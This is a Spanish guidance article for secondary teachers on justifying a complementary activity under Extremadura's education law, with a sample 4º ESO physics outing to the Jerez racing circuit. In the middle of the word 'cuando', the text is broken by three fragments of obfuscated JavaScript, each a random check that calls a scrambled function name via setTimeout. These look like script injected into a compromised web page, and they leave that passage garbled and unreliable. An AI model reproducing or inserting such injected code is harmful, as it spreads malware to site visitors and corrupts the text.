JUSTIFICACIÓN DE UNA ACTIVIDAD COMPLEMENTARIA

Autor: Antonio Luis Merchán Vacas





Con este escrito se pretende orientar al profesorado sobre el diseño y la justificación de una actividad complementaria.


“El desarrollo de las competencias básicas debe facilitarse también mediante


el adecuado funcionamiento de los centros, las actividades docentes, las


formas de relación que se establezcan entre los integrantes de la comunidad


educativa y las actividades complementarias y extraescolares que organicen


los centros”. Esto se recoge en el decreto 87/2007 por el que se establece el


currículo de la ESO en Extremadura.


La LEEX, como es lógico, también hace referencia a las actividades


complementarias en su artículo 15, y las define como actividades que se


desarrollarán fuera del horario lectivo y tendrán como objetivo completar la


acción educativa del alumnado. Serán programadas e impartidas por personal


debidamente cualificado.


De estos dos documentos se recoge la importancia de estas actividades en la


formación del alumnado, por ello cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se programen hay que justificar la


realización de las mismas de acuerdo con la legislación vigente, es decir


tenemos que encuadrar dicha actividad dentro del marco educativo establecido.


Para ello os propongo un ejemplo que puede servir de modelo a la hora de


diseñar una actividad complementaria, en este caso para 4º ESO.


Actividad complementaria: Visita al circuito de velocidad de Jerez


1. Objetivos que se persiguen:


–Estudiar los distintos movimientos.


–Identificar las fuerzas que actúan.


–Reconocer las transformaciones energéticas que se producen.


–Disfrutar de una jornada de convivencia fuera del centro.


2. Contenidos que se van a tratar:


–Trayectorias que siguen los coches.


–Movimiento rectilíneo uniforme.


–Movimiento rectilíneo uniformemente variado.


–Movimiento circular uniforme.


–Fuerza de rozamiento.


–Fuerza centrípeta.


–Energía cinética y potencial.


–Energía calorífica.